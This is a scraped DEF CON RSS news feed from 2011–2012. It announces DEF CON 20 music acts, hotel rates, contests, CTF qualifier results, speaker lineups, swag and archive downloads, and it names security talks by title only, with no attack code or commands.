https://www.defcon.org/defconrss.xml Dope beats are essential to a healthy immune system and a sparkly brain. FACT. Information retention is vastly increased by combining DJ sets with contained bodies of cool, chlorinated water. FACT. The entertainment schedule for DEF CON 20 is up for your perusal, and it's pretty packed. There tons of bands, DJs and even an area to just chill and rest your weary neocortex. Music until the wee hours, from Thursday through Sunday. You can check out Minibosses, or Frontalot, or REGENERATOR or Mochipet. It's like one of those outdoor music festivals, but with enough sense to come inside. Face it. Where else do you get to see Keith Myers versus Zack Fasel in a battle of hacker DJs? Or a band composed entirely of DEF CON Goons? Or the ever-awesome Miss DJ Jackalope rocking the same party as Crystal Method? As always, planning is key - so go check out the schedule and schedule in your Recommended Daily Allowance of rhythm

==> DEF CON Swag Has a New Online Home - Welcome Hackerstickers.com!

https://www.defcon.org/defconrss.xml Hackerstickers.com is now the official online retailer of DEF CON merchandise. They carry the whole line, from T-shirts to Zippos. And also stickers. All that and they also carry picksets and a wide variety of caffeine delivery devices. If you're in the market for hacker swag, check out Hackerstickers. Tell 'em DEF CON sent ya.

==> DT's Tamper Evident Contest is Live!

https://www.defcon.org/defconrss.xml The world is full of 'tamper-proof' packaging. You're expected to trust it, but how strong are those measures, really? This is a contest about defeating these physical measures in a documentable, elegant fashion that leaves no trace of your attack. You can enter alone or with a team, and you can even enter the 'Unlimited 'class that allows you to use any tools or gear you can get your hands on. Registration is open in the Tamper Evident Signup Forum Thread. To learn the rules and get a feel for the contest, go to the Tamper Evident Contest Thread. Space is limited, so if you think this is a contest for you, get yourself signed up!

==> Short Story Contest Winners!

https://www.defcon.org/defconrss.xml Thanks to everyone who participated in this year's Short Story Contest. It's cool to see how much literary talent is bubbling under the surface of the DEF CON community. This year's winners are: -People's Choice Winner - DEF CON Unbound by John McNabb -First Place - A Silent, Private Place by Davien -Second Place - DEF CON Unbound by John McNabb -Honorable Mention - DEF CON - The Beginning of the End by Siobahn Morrison To read the winning stories, and all of the participants, you can head over to the DEF CON Forums Short Story Contest thread. Congratulations to the winners!

==> DEF CON Art Contest Returns!

https://www.defcon.org/defconrss.xml This year's DEF CON art contest is going to be just a little different. First, you'll only have a few weeks to submit your masterpiece. All entries must be submitted by July 6th. That's a lot less lead time, but we're pretty sure pressure sharpens the mind. The theme is also going to be a little different. Since this is DEF CON's 20th anniversary, we're asking for poster-style artwork that imagines DEF CON 20 years from now. What do you think we'll be sharing with each other at DEF CON 40? What will hackery look like in 2032? You're free to share your vision, whether you tend toward kittens and lollipops or brutal post-human hellscapes. We'll share the best pieces with everyone through Facebook and the DEF CON website, and we'll post the winners in a prestigious spot at the con. So don't be shy - fire up your favorite digital artmaker and give your right brain a workout. Submission Deadline: All submissions must be received by July 6, 2012 Submit entries to: neil [at] defcon dot org Submission info to include: Real name (your identity must be verifiable to collect a prize) and desired nick/handle if any; and a title and description of your piece. Additional Specs: Maximum poster size 11"x17". Final entries should be in 300pi minimum .tif or .jpg format. Vector entries can be in .ai or .eps format. Delivery is the responsibility of the entrant, if the entry is too large to email you may post it online for download. Prizes: Entries will be judged together this year, with prizes for the top three finishers. 1st Place: Two Free admissions to DEF CON 20, and a $200 credit at the DEF CON Swag Booth. 2nd Place: Free admission to DEF CON 20, and a $100 credit at the DEF CON Swag Booth. 3rd Place: Free admission to DEF CON 20, and a $50 credit at the DEF CON Swag Booth.

==> Capture the Packet is Back!

https://www.defcon.org/defconrss.xml "Search Network Traffic, Locate Clues, Solve Puzzles and Score" Capture the Packet returns for a third year, and this time there's a Black Badge up for grabs! You can sign up your team (2 players max), learn the rules and read the FAQ by heading over to the DC20 CTP express sign-up page.

==> CTF Write-up Round-up!

https://www.defcon.org/defconrss.xml As promised, here are some links to write-ups of the past weekend's hot CTF qualification action. The biggest list of links I've seen is at the Deva [Me, Myself and InfoSec] blog. That's a good first stop. A few more links below. * From the VSzA Techblog, write-ups of the grab bag 300 and urandom 300 * From the Security Black Swan blog, a write-up of b 100, b 200 and urandom 300. * If you can read Chinese, Insight Labs has a writeup of Forensics 300 and b 300 If you know of an especially good writeup that's not on the list, let us know on Facebook or Twitter.

==> CTF Quals Results Are In!

https://www.defcon.org/defconrss.xml The CTF qualifications are complete, and it's time to announce the victors. The teams listed below have earned your respect and the opportunity to fight it out in Vegas. #|Score|Team 1 4900 Hates Irony 2 4800 PPP 3 4400 侍 4 4400 sutegoma2 5 4400 Shellphish 6 4400 TwoSixNine 7 4200 European Nopsled Team (DC 19 winner) 8 4100 More Smoked Leet Chicken 9 4100 our name sucks 10 4100 ACME Pharm 11 4100 WOWHACKER-PLUS We'll be scouring the Intertubes to bring you write-ups of the action, so watch this space. Thanks to everyone who participated, and congratulations to the winners. The game is afoot.

==> Vote for DC Recognize Awards!

https://www.defcon.org/defconrss.xml DEF CON is proud to announce the 2nd annual DEF CON awards ceremony, renamed the DC Recognize Awards. These awards are given to deserving individuals in the community, industry, and media. For DC20, we've shaken things up and included 7 different categories for your voting pleasure. Nominations will be held online, at SurveyMonkey, until July 10th. From July 11th until the conference, the DEF CON Awards Selection Committee will review all the nominations for validity and evidence. The top group of nominations that meet the nomination criteria, have the best justification, and are generally worthwhile will be presented for voting during the DEF CON Recognize Awards Ceremony at DEF CON. All nominated individuals will be invited to the ceremony to receive their award in person, and provide a short "Thank you!" or "justification". To ensure your nomination is not discarded, include as much vital information as possible for your nomination. Links to stories, articles, media, or other evidence (product information, blogs, etc) should be included. Be sure to attend the DC Recognize Awards Ceremony at DEF CON to vote for your choice in each of the 7 categories! Your hosts again this year will be Jericho, Jeff Moss, and Russ Rogers. You can get your nominations in at the DEF CON Recognize Award Nomination Form!

==> Check Out Our New Vendor Page!

https://www.defcon.org/defconrss.xml The DEF CON Vendor Area never disappoints. There's always an eclectic mix of merchandise to paw through, from cutting-edge reading material to mutant hardware custom-made for the apocalypse. This year we'll be featuring the vendors on a page of their own, so that you can get to know them before the Con. We'll update as the list grows, so keep an eye peeled. Check the DEF CON 20 Vendor Page .

==> Social Engineering CTF Contest for Kids!

https://www.defcon.org/defconrss.xml Running to find the clues... racing to pick the locks, cracking codes, breaking ciphers and frantically fighting against the clock? This is not the theme of the latest Mission Impossible movie. No, this it the theme of the DEF CON 20 Social Engineering Capture the Flag for Kids - Return of the Schmooze. Here is the Cliff's Notes version. If you: * are 6-16 years of age * think outside of the box * enjoy challenges that will test your limits * want to race the clock to solve mind-bending puzzles * want to learn how to pick locks, solve ciphers, break code and use social engineering in your everyday life * enjoy cool prizes This competition will give you all the tools and instruction you need to learn these skills and many more. Although the contest will challenge you, it will be fun, entertaining and very educational. Then you have no choice, grab your parents and head over the registration page below and fill out all the details. Then it's time to get your brains ready for RETURN OF THE SCHMOOZE! Register Here, NOW!

==> DEF CON 20 Documentary and Call for DEF CON History!

https://www.defcon.org/defconrss.xml As you may have heard, in honor of our 20th anniversary, we have a DEF CON Documentary in the making by none other than Jason Scott of textfiles.com! Jason has made an announcement about it on his blog at ascii.textfiles.com, so go check out what it's all about! Near the end of the post, he asks for your help finding various pieces of DEF CON history, lore and artifacts. So if you have any of the footage or pictures listed, please help him out!

==> DEF CON 20 Speaker Page is Live! First round posted!

https://www.defcon.org/defconrss.xml The first round of Speakers is now live on the DEF CON 20 Speaker Page for your perusal! Enough said, now go and check 'em out! Welcome & Making the DEF CON 20 Badge + Special Presentation by Jason Scott The Dark Tangent, LosT, and Jason Scott DEF CON 101 Movie Night With The Dark Tangent: "Code2600" + Q&A With the Director Jeremy Zerechak Movie Night With The Dark Tangent: "Reboot" + Q&A With the Filmmakers and Actors Joe Kawasaki, Sidney Sherman, and Actors To Be Announced Movie Night With The Dark Tangent: "21" + Q&A With "MIT Mike" Aponte "MIT Mike" Aponte Owning Bad Guys {And Mafia} With Javascript Botnets Chema Alonso and Manu "The Sur" <ghz or bust: defcon atlas Overwriting the Exception Handling Cache PointerDwarf Oriented Programming Rodrigo Rubira Branco, James Oakley, and Sergey Bratus Tenacious Diggity: Skinny Dippin in a Sea of Bing Francis Brown and Rob Ragan Exploit Archaeology: Raiders of the Lost Payphones Josh Brashars Panel: Meet the Feds Panelists To Be Announced Life Inside a Skinner Box: Confronting our Future of Automated Law Enforcement Greg Conti, Lisa Shay, and Woody Hartzog DEF CON Awards Hacking Humanity: Human Augmentation and You Christian "quaddi" Dameff, Jeff "r3plicant" Tully Sploitego - Maltego's (Local) Partner in Crime Nadeem Douba Post Metasploitation: Improving Accuracy and Efficiency in Post Exploitation Using the Metasploit Framework Egypt Post-Exploitation Nirvana: Launching OpenDLP Agents over Meterpreter Sessions Andrew Gavin, Michael Baucom, and Charles Smith More Projects of Prototype This! Joe Grand and Zoz Crypto and the Cops: the Law of Key Disclosure and Forced Decryption Marcia Hofmann Black Ops Dan Kaminsky Owning One to Rule Them All Dave Kennedy and Dave DeSimone Detecting Reflective Injection Andrew King An Inside Look Into Defense Industrial Base (DIB) Technical Security Controls: How Private Industry Protects Our Country's Secrets James Kirk TBA Moxie Marlinspike Skype VoIP Software Vulnerabilities: Advanced 0Day Exploitation Benjamin Kunz Mejri Defcon Comedy Jam V, V for Vendetta David Mortman, Rich Mogull, Chris Hoff, Dave Maynor, Larry Pesce, and James Arlen Cortana: Rise of the Automated Red Team Raphael Mudge Panel: The Making of DEF CON 20 Hacker + Airplanes = No Good Can Come Of This RenderMan MegaUpload: Guilty or Not Guilty? Jim Rennie and Jennifer Granick Spy vs. Spy: Spying on Mobile Device Spyware Michael Robinson and Chris Taylor Bruce Schneier Answers Your Questions Bruce Schneier Can You Track Me Now? Government And Corporate Surveillance Of Mobile Geo-Location Data Christopher Soghoian, Ben Wizner, Catherine Crump, and Ashkan Soltani Can Twitter Really Help Expose Psychopath Killer Traits? Chris "TheSuggmeister" Sumner Twenty Years Back, Twenty Years Ahead: The Arc of DEF CON Past and Future Richard Thieme Safes and Containers: Insecurity Design Excellence Marc Weber Tobias, Matt Fiddler, and Tobias Bluzmanis TBA Paul Vixie

==> Elite Force is Playing DEF CON 20!

https://www.defcon.org/defconrss.xml Elite Force We have another major addition to the Saturday night DEF CON White Ball music line-up alongside The Crystal Method! DEF-CON is excited to bring renowned breaks+tech-funk act Elite Force to resonate your ears and chest cavity. Recently most well known for his RE:VAMPED series re-working such artists as Aphex Twin, Propellerheads, Meat Katie, Datsik, and many many others, Elite Force has been an established hacker friendly act for years. In fact, you may have heard of him through one of his earlier projects: Lunatic Calm (with the hit song "Leave You Far Behind," featured on movie soundtracks like The Jackal, Mortal Kombat Annihilation, and The Matrix). Official Website: http://www.eliteforcemusic.com/ Soundcloud: http://soundcloud.com/elite-force Videos: 1) Elite Force - Society Suicides: http://www.youtube.com/watch?v=nceAGqfdykQ 2) Elite Force - Captain America: http://www.youtube.com/watch?v=vWkJ7nYE0cU 3) Elite Force - Law of Life: http://www.youtube.com/watch?v=oWnjVRobf0w 4) Elite Force - Mainframe Wrekka: http://www.youtube.com/watch?v=z3d6MMp9Gjk 5) Lunatic Calm - Leave You Far Behind: http://www.youtube.com/watch?v=maP6q3D4Hf0

==> DEF CON Extended Room Block at Rio is almost SOLD OUT!

https://www.defcon.org/defconrss.xml Peak nights Friday and Saturday are almost gone. You can still save money and be at Rio by booking the nights available at our discounted rate and then paying the Rio rate for any nights that are no longer available in our Block. When Friday and Saturday are sold out in our block the Rio rate of 7/27 at $299 and 7/28 at $329 will show up on your reservation. These rates are subject to change based on availability. Or we have rooms at Bally's Starting on May 4th we will have overflow rooms at Bally's. There is a shuttle between Bally's and Rio That runs all day and into the evening. Rates at Bally's are as follows: Wednesday 7/25 $70.00 Thursday 7/26 $70.00 Friday 7/27 $150.00 Saturday 7/28 $150.00 Sunday 7/29 $70.00 To book at Bally's, use this link: http://www.totalrewards.com/hotel-reservations?propCode=BLV&groupCode=SBDEF2 Or call 1-800-358-8777 and reference group code SBDEF2

==> More Rooms at the Rio!

https://www.defcon.org/defconrss.xml Limited additional room block open at Rio for DEF CON attendees. Save $100.00 per night for the weekend nights! Wednesday night $138.00 Thursday night $158.00 Friday & Saturday nights $178.00 Act now before they are gone! If you made your reservation during the time our block was filling up and you paid a higher rate for one or more nights the Rio has already adjusted your rate to the new current / lower rate.

==> Press Registration for DEF CON 20!

https://www.defcon.org/defconrss.xml Journalists! Want to register as press for DEF CON 20? Check out the new Press Registration page for the rules and how you can apply for a press badge at DEF CON!

==> Reminders and New Pre-con Calendar

https://www.defcon.org/defconrss.xml As DEF CON 20 planning revs in to high gear, we thought it might be useful to have a central location for important pre-con dates and deadlines. Enter the Pre-con Calendar, a new page for keeping track of just such dates! Have a look, and if you have a contest or event, with deadlines before con, that could use an entry on the calendar, send it to neil {at} defcon }dot{ org. Check back there frequently for new dates! Here are some of the upcoming dates you may want to remember: * April 15 - Vendor Application Opens * April 30 - Call for Music Closes * May 1 - Contest & Event RFI Closes * May 28 - Call for Papers Closes * June 1-3 - CTF Quals * June 8 - Printed Program Materials Due

==> DEF CON 20 CTF Updates!

https://www.defcon.org/defconrss.xml News from the CTF front! The announcement of the DEF CON 20 CTF Quals was recently announced, and will take place June 1-3, 2012. You can find the details at ddtek.biz! We have another recent qualifying team to announce, team LeetChicken has won the Codegate 2012 YUT Challenge, which automatically qualifies them for DEF CON 20 CTF! Congratulations to them! You can find all kinds of CTF info on the DEF CON 20 CTF Page, and tons of CTF links an write ups in the CTF Archive!

==> DEF CON 20 Site is Live!

https://www.defcon.org/defconrss.xml If you're looking for a central location for all the latest info on this year's DEF CON, you're in luck! The DEF CON 20 site is now live at https://www.defcon.org/html/defcon-20/dc-20-index.html!

==> 200 for 20

https://www.defcon.org/defconrss.xml We'd like to announce that the price for DEF CON 20 will be $200 USD. What will we do with our ill-gotten gains, you may ask? We're going to make the 20th anniversary of DEF CON one to remember. More special swag, great live music, help for the contests to grow, 20 teams for CTF, special speakers, and numerous other secret stuffs. Believe us when we say it'll be the most epic DEF CON ever! Want to get involved in making DEF CON 20 even more k-rad? Participate on the forums https://forum.defcon.org/

==> The Crystal Method at DEF CON 20!

https://www.defcon.org/defconrss.xml The Crystal Method As part of our 20th anniversary celebration, DEF CON is ecstatic to announce the headlining act for our Saturday evening White Ball: The Crystal Method! These guys are pioneers in the electronic music scene, with soundtrack appearances on movies like Spawn, Blade, The Replacement Killers, and many others. Here are some samples to tide you over: Drown in the Now feat. Matisyahu Comin Back Sine Language feat. LMFAO

==> Which Past Shirts Should We Re-print for DEF CON 20?

https://www.defcon.org/defconrss.xml We're thinking of doing a limited run of a few past shirts for sale at DEF CON, but which ones should we do? You can help us decide by checking out the gallery of past shirts on our Facebook page, and then voting for your favorite in our survey also on Facebook, or at: https://www.surveymonkey.com/s/defconshirts

==> Reboot Sneak Preview at DEF CON 20!

https://www.defcon.org/defconrss.xml Reboot poster We are very excited to announce an Exclusive Sneak Preview screening of the film Reboot at DEF CON 20! Here is a peek at the premise from an article on the film: "Set within a dystopian world that is a collision between technology and humanity, "Reboot" touches upon many of the current social and political concerns that arise from becoming more and more intertwined with the virtual. In contemporary Los Angeles, a young female hacker (Stat) awakens from unconsciousness to find an iPhone glued to her hand and a mysterious countdown ticking away on the display. Suffering from head trauma, and with little recollection of who she is or what is happening, Stat races against time to figure out what the code means, and what unknown event the pending zero-hour will bring." We are also excited that the filmmakers and lead cast members will be on hand at DEF CON for a Q&A session along with the screening! We'll have more info as this solidifies. If you are looking for a fun gaming challenge, Reboot has a cool alternate reality game in which you can participate as well! Find more info at http://www.rebootfilm.com/scoreboard. Watch the Trailer!

==> Special Music Events at DEF CON 20!

https://www.defcon.org/defconrss.xml mochipet Exciting news that is first in a series of many! DEF CON is officially announcing some big musical guests this year, the first of whom is breakcore/glitch/hip-hop all-star Mochipet! You'll be able to catch him at the DEF CON 20 official opening Thursday night pool party! Here are a few examples of Mochipet in action: Whomp-a-saurus bleep Mochipet Godzilla New Year Video by Savage Henry A Milli Girls - Mochipet (pseudo-NSFW)

==> CODE 2600 Showing at DEF CON 20!

https://www.defcon.org/defconrss.xml DEF CON is happy to announce Code 2600 will be showing at DEF CON 20! We will be the first hacker con to have the film shown and we are pretty excited about it. Like the CODE 2600 Facebook page for more info! About the film: CODE 2600 documents the rise of the Information Technology Age as told through the events and people who helped build and manipulate it. The film explores the impact this new connectivity has on our ability to remain human while maintaining our personal privacy and security. As we struggle to comprehend the wide-spanning socio-technical fallout caused by data collection and social networks, our modern culture is trapped in an undercurrent of cyber-attacks, identity theft and privacy invasion. Both enlightening and disturbing, CODE 2600 is a provocative wake-up call for a society caught in the grips of a global technology takeover. The Cast: Bruce Schneier, Chief Security Technology Officer, BT Jeff Moss, Founder Def Con and Black Hat Marcus Ranum, Chief Security Officer, Tenable Security Jennifer Granick, Civil Liberties Director, EFF Dr. Bob Lash, Original Member of the Homebrew Computer Club Eric Michaud, Founder, Pumping Station One Gideon Lenkey, Security, CEO RA Security Systems Lorrie Cranor, Cylab, Carnegie Mellon University Phil Lapsley, Phone Phreaking Expert, Author Robert Vamosi, Computer Security Journalist, Author Wallace Wang, Author, "Steal This Computer Book"

==> DEF CON 20 Contest & Events!

https://www.defcon.org/defconrss.xml We wanted to take a minute and point out some of the buzz around contests and events that are brewing on the DEF CON Forums and elsewhere. As you know, LosT @ Con Mystery Challenge will be returning for DEF CON 20, it looks like LosT may or may not already be seeding clues on Twitter (@1o57). The Unofficial DEF CON Shoot is looking pretty active in the planning stages. Other contests and events that have active forums are: 10,000 Hacker Pyramid Capture the Flag Project 2 Scavenger Hunt Schemaverse DEF CON 101 Goon Band Hardware Hacking Village Skytalks Wireless Village HackBus Toxic BBQ So head over to the Forums and see what's up! You can also keep up with all the updates as they occur on the DEF CON Twitter, The DEF CON RSS Feed, and the DEF CON Facebook Page!

==> New Speaker's Corner!

https://www.defcon.org/defconrss.xml We have a brand spanking new Speaker's Corner for you, where Nikita gives her speaker liaison insight into what makes your CFP submission stand out! A must read for the aspiring or seasoned DEF CON submitter!

==> DEF CON 20 Contest & Event RFI

https://www.defcon.org/defconrss.xml The DEF CON 20 Contest & Event Request for Information is live! If you already run or want to run a contest or event at DEF CON 20, it's where to find all of the info you need to get your contest or event on the map! Check it out at: https://www.defcon.org/html/defcon-20/dc-20-contest-rfi.html

==> Book a Room at the Rio for DEF CON 20!

https://www.defcon.org/defconrss.xml You can now book a room at the Rio for DEF CON 20 at our group rate! Do this one of two ways: Go to http://www.totalrewards.com/hotel-reservations?propCode=RLV&groupCode=SRDEF12, or call the hotel directly at 888-746-6955 and reference group code SRDEF12. The nightly rates are split up as follows: 7/22 through 7/26 is $104 7/27 and 7/28 is $118 Then 7/29 through 7/31 is again $104 Get on it soon! Space is limited!

==> The DEF CON 20 Call for Papers is Open!

https://www.defcon.org/defconrss.xml It's time again, friends, for the DEF CON Call for Papers to Open! Read the CFP announcement and fill out the CFP form to have the chance to present your ninja research at DEF CON's 20th Anniversary!

==> DC20 CTF Announcement!

https://www.defcon.org/defconrss.xml Exciting news regarding the Capture the Flag Competition at DEF CON 20! Check out the announcement here.

==> New Speaker's Corner!

https://www.defcon.org/defconrss.xml Paul Renda discusses the elements of what could make a successful doomsday worm in this new Speaker's Corner entitled "A Prima On An Internet Doomsday Worm."

==> Merry Christmas from DEF CON! Here's a Special Gift!

https://www.defcon.org/defconrss.xml It seems Santa has been in our servers, (I don't know how he does it, he must be 1337) and has left you a special gift! The Speaker & Slides video, as well as the the Audio from DEF CON 19 is now live and awaiting your downloading pleasure. You can find them on the DEF CON 19 Archive page, or on the following RSS Feeds: https://www.defcon.org/podcast/defcon-19-video.rss https://www.defcon.org/podcast/defcon-19-audio.rss As 2011 winds down, we're working hard behind the scenes for a spectacular 20th anniversary of DEF CON in 2012! So keep your eyes on the DEF CON Facebook, Twitter, RSS Feed, or defcon.org for all the info as it happens! Enjoy!

==> Welcome New DEF CON Groups!

https://www.defcon.org/defconrss.xml We'd like to welcome the following new groups to the DCG fold! Domestic DC317 - Indianapolis, IN DC614 - Columbus, OH DC765 - Lafayette, IN DC909 - Pomona, CA International DC00497151 - Stuttgart, Germany DC00977 - Lalitpur, India DC02139 - Kiev, Ukraine DC110006 - Delhi, India DC15033 - Casale Monferrato, Italy DC560001 - Bengaluru, India DC636 - Mexicali, Baja California, Mexico DC700077 - Kolkata, Westbengal, India DC880 - Dhaka, Bangladesh DC91022 - Mumbai, India DC91361 - Guwahati, India You can find out more about DEF CON Groups on the DCG FAQ, or follow DCG happenings on Facebook!

==> Christmas Deal on DEF CON 19 DVD Sets From TSOK!

https://www.defcon.org/defconrss.xml If you're looking for the perfect Hacker gift, you can purchase the full DVD sets from DEF CON 19 from The Source of Knowledge at discounted prices up through Christmas Eve!

==> Hacker Jeopardy, Hacker Pyramid and Closing Ceremonies Video!

https://www.defcon.org/defconrss.xml Even though Halloween has come and gone, we have some tasty video treats for your viewing pleasure! Check out the videos from 10,000 Hacker Pyramid, Hacker Jeopardy, and the DEF CON 19 Closing Ceremonies, and you can enjoy or re-live some of the fun we had at DEF CON 19! 10,000 Hacker Pyramid and Hacker Jeopardy - Friday Night 10,000 Hacker Pyramid and Hacker Jeopardy - Saturday Night DEF CON 19 Closing Ceremonies

==> DEF CON 19 Video is Live!

https://www.defcon.org/defconrss.xml At long last, we would like to present the DEF CON 19 video presentations (slides w/ audio of the talk) for your viewing enjoyment! You can access them on the DEF CON 19 Archive page, or on the RSS Feed at https://www.defcon.org/podcast/defcon-19-slides.rss!

==> Welcome New DEF CON Groups!

https://www.defcon.org/defconrss.xml A big welcome to the most recent additions to DEF CON Groups! Domestic 402 - Omaha, NE 410 - Baltimore, MD 509.1 - Spokane, WA 702 - Las Vegas, NV 801 - Salt Lake City, UT 805 - Thousand Oaks, CA International 003348 - Presidencia Roque Senz Pea, Chaco, Argentina 0101 - Bogata, Columbia 0131 - Casale Monferrato, Italy 0497 - Kerala, India 303002 - Jaipur, India 6221 - Jakarta, Indonesia 9180 - Bangalore, Karnataka, India 91824 - Mangalore, Karnataka, India 941 - Colombo, Sri Lanka 9663 - Dhahran, Saudi Arabia To find the DEF CON Group in your area check out the DCG Listing Page. If there isn't one, you can start one! Check out the DCG Point of Contact FAQ for details.

==> Download the DEF CON 19 DVD!

https://www.defcon.org/defconrss.xml We have posted the DEF CON 19 DVD content on media.defcon.org in two .iso images, one is the original DVD distributed at the show, and the other contains all the same content, but with the updated slide decks from the speakers. Download them at the following links: https://media.defcon.org/dc-19/defcon-19-dvd-original.iso (~1.6 GB) https://media.defcon.org/dc-19/defcon-19-dvd-updated.iso (~1.7 GB) Enjoy!

==> Press Page updated for DEF CON 19!

https://www.defcon.org/defconrss.xml Check out the DEF CON Press Archive or the DEF CON 19 Archive page to see what the top stories of DEF CON 19 were all about! We hear we will be receiving the audio and slide video from DC19 soon, so keep your eyes on our Twitter and Facebook pages for the heads up when we get it posted!

==> Contest Results Page is Up!

https://www.defcon.org/defconrss.xml Check out the results of many of the innovative and challenging contests that occurred at DEF CON 19. If you ran a contest and would like the results posted, email them to neil [at] defcon ]dot[ org and we'll get them up!

==> New Presentation Materials RSS Feed

https://www.defcon.org/defconrss.xml Many of you know about our Archive Page, recently we uploaded all the presentation materials from DEF CON 19. The thought occurred to us, what if you want to download them all at once and in an attractive RSS? So we made one. Not all presentations have PDF enclosures but we wanted to be complete and list every abstract and Bio we had for our speaker roster. As soon as we can encode and post the Audio and Video RSS we will, in the meantime, enjoy the DEF CON 19 Materials. Join the discussion thread on the DEF CON Forums: https://forum.defcon.org/forumdisplay.php?f=611. Don't forget to join our Facebook page www.facebook.com/defcon to get involved as well.

==> The DEF CON 19 Archive Page is up, slides posted!

https://www.defcon.org/defconrss.xml Head on over to the DEF CON 19 Archive page, where you can find the slides submitted for this year's talks! You can also download a copy of the Program guide. Keep an eye on this page for updates in the coming weeks, including press, video, audio, music and other great stuff from DEF CON 19!

==> Thanks for a Great Con!

https://www.defcon.org/defconrss.xml Well another DEF CON has come and gone, and was it ever a great one! We'd like to give a huge shout out to all of you who attended and made it all worthwhile! Big thanks to all of the speakers, workshop instructors, contest/event & village organizers, and vendors who provide so much awesome content for this con! Not to mention the multitudes of goons who make it all run like a well-oiled machine, as well as the fantastic staff at the Rio who went above and beyond for this unknown (to them) and crazy group of 11-12 thousand hackers! We are still reeling that the first year in a new hotel ran so smoothly! We're back in the saddle now after a little much needed R&R, so you can expect the content, press, contest results, and highlights to start rolling in over the next few days and weeks. In fact, it seems like the planning crew is already psyched and bursting at the seams with great ideas for next year, our 20th anniversary! Expect it to be epic! Keep your eyes on the DEF CON RSS, Twitter and Facebook pages for the latest updates as they roll in. Also check out the DEFCON 19 and Beyond Forum on the DEF CON Forums for all of the disussions about this year's show!

==> Huge Speaker Update!

https://www.defcon.org/defconrss.xml Here are 46 more reasons to be at DEF CON 19! Read On...

==> DEF CON Workshops are Live!

https://www.defcon.org/defconrss.xml New for Def Con 19, Workshops extends the experience of learning to the classroom. Take your time and get it right by getting some hands-on time with hardware, software, and picking the minds of some of the most interesting hackers in their fields. Bring your thinking cap and get ready to be schooled. Read On...

==> The DEF CON Awards!

https://www.defcon.org/defconrss.xml New, for DEF CON 19 - the DEF CON Awards! DEF CON introduces the DEF CON Awards to recognize people/projects/companies for their competence (or lack thereof) in the hacking or security world. Nominations will be accepted for the categories below until July 6th, 2011. Voting will be conducted online for three of the categories from July 8th - July 29th, 2011 (voting link will be provided at a later time). Do you have a favorite hacker oriented author that best represents the hacker lifestyle and scene? Do you have inside knowledge of the most interesting malware to hit the net this year? Or was there a media outlet that best represents the WORST in coverage of real news concerning hackers or security topics? Now's your chance to have a voice. Get your nominations in today, and give credit where credit is due. Be sure to provide supporting information, such as links to websites, news articles, or software. Turn in your nominations here: http://www.surveymonkey.com/s/2JDHC23

==> So Many Speakers!

https://www.defcon.org/defconrss.xml Take a minute to peruse this fantastic set of additions to the DEF CON 19 line-up! Fingerbank — Open DHCP Fingerprints Database Olivier Bilodeau PacketFence, The Open Source Nac: What We've Done In The Last Two Years Olivier Bilodeau Kinectasploit: Metasploit Meets Kinect Jeff Bryner Metasploit vSploit Modules Marcus J. Carey and David Rude Look At What My Car Can Do Tyler Cohen VDLDS — All Your Voice Are Belong To Us Ganesh Devarajan and Don LeBert Don't Drop the SOAP: Real World Web Service Testing for Web Hackers Tom Eston, Josh Abraham, and Kevin Johnson Handicapping the US Supreme Court: Can We Get Rich by Forceful Browsing? Foofus Strategic Cyber Security: An Evaluation of Nation-State Cyber Attack Mitigation Strategies Kenneth Geers Smartfuzzing the Web: Carpe Tuorum Foramina Nathan Hamiel, Gregory Fleischer, Justin Engler, and Seth Law Economics of Password Cracking in the GPU Era Robert "Hackajar" Imhoff-Dousharm Battery Firmware Hacking Charlie Miller Big Brother on the Big Screen: Fact/Fiction? Nicole Ozer Archive Team: A Distributed Preservation of Service Attack Jason Scott Insecurity: An Analysis Of Current Commercial And Government Security Lock Designs Marc Weber Tobias, Matt Fiddler, and Tobias Bluzmanis DIY Non-Destructive Entry Schuyler Towne Seven Ways to Hang Yourself with Google Android Jacob West and Yekaterina Tsipenyuk ONeil Key Impressioning Jos Weyers Phishing and Online Scam in China Joey Zhu Vanquishing Voyeurs: Secure Ways To Authenticate Insecurely Zoz and Andrea Bianchi

==> New Talks

https://www.defcon.org/defconrss.xml Here's another bundle of talks to whet your appetite for DEF CON Madness! More to come in the next couple days! (Read on...)

==> Talks Keep on Coming!

https://www.defcon.org/defconrss.xml Another batch of fine DEF CON content has been added to the mix! Check out newest additions to our line-up! The Art and Science of Security Research Greg Conti Internet Kiosk Terminals : The Redux Paul Craig Introduction to Tamper Evident Devices datagram Earth vs. The Giant Spider: Amazingly True Stories of Real Penetration Tests Rob Havelt and Wendel Guglielmetti Henrique Sounds Like Botnet Itzik Kotler and Iftach Ian Amit Panel: Is it 0-day or 0-care? Jake Kouns, Brian Martin, Steve Christey, Carsten Eiram, Art Manion, Dan Holden, Alex Hutton and Katie Moussouris Vulnerabilities of Wireless Water Meter Networks John McNabb Blinkie Lights: Network Monitoring with Arduino Steve Ocepek My password is: #FullOfFail! — The Core Problem with Authentication and How We Can Overcome It Jason M. Pittman Mobile App Moolah: Profit taking with Mobile Malware Jimmy Shah Weaponizing Cyberpsychology and Subverting Cybervetting for Fun, Profit and Subterfuge Chris "TheSuggmeister" Sumner and alien Staring into the Abyss: The Dark Side of Crime-fighting, Security, and Professional Intelligence Richard Thieme

==> DC19 CTF Quals Update!

https://www.defcon.org/defconrss.xml Another DEF CON CTF Qualification round has passed, and with it 12 teams will ascend to their slots in the DEF CON 19 Capture the Flag Competition. The qualifying teams have not been posted just yet, so keep an eye on ddtek.biz for the winners, and we'll announce them as well when we have the results. For now, we have collected as many write-ups as we could find from this year's Quals for your consumption! (Read on...)

==> More Speakers Posted!

https://www.defcon.org/defconrss.xml Another poppin' fresh batch of speakers is now live on the speaker page. Here's a handy list of the new offerings! Bosses love Excel, Hackers too. Chema Alonso and Juan Garrido "Silverhack" Three Generations of DoS Attacks (with Audience Participation, as Victims) Sam Bowne Familiarity Breeds Contempt Sandy "Mouse" Clark and Brad "RenderMan" Haines Cipherspaces/Darknets: An Overview Of Attack Strategies Adrian Crenshaw "Irongeek" Speaking with Cryptographic Oracles Daniel Crowley Smile for the Grenade! "Camera Go Bang!" Vlad Gostom and Joshua Marpet Assessing Civilian Willingness to Participate in On-Line Political and Social Conflict Thomas J. Holt and Max Kilger Hacking and Securing DB2 LUW Databases Alexander Kornbrust PIG: Finding Truffles Without Leaving A Trace Ryan Linn Hacking .Net Applications: The Black Arts Jon McCoy Safe to Armed in Seconds: A Study of Epic Fails of Popular Gun Safes Deviant Ollam Port Scanning Without Sending Packets Gregory David Pickett

==> CTF Qualification Round Begins Tomorrow!

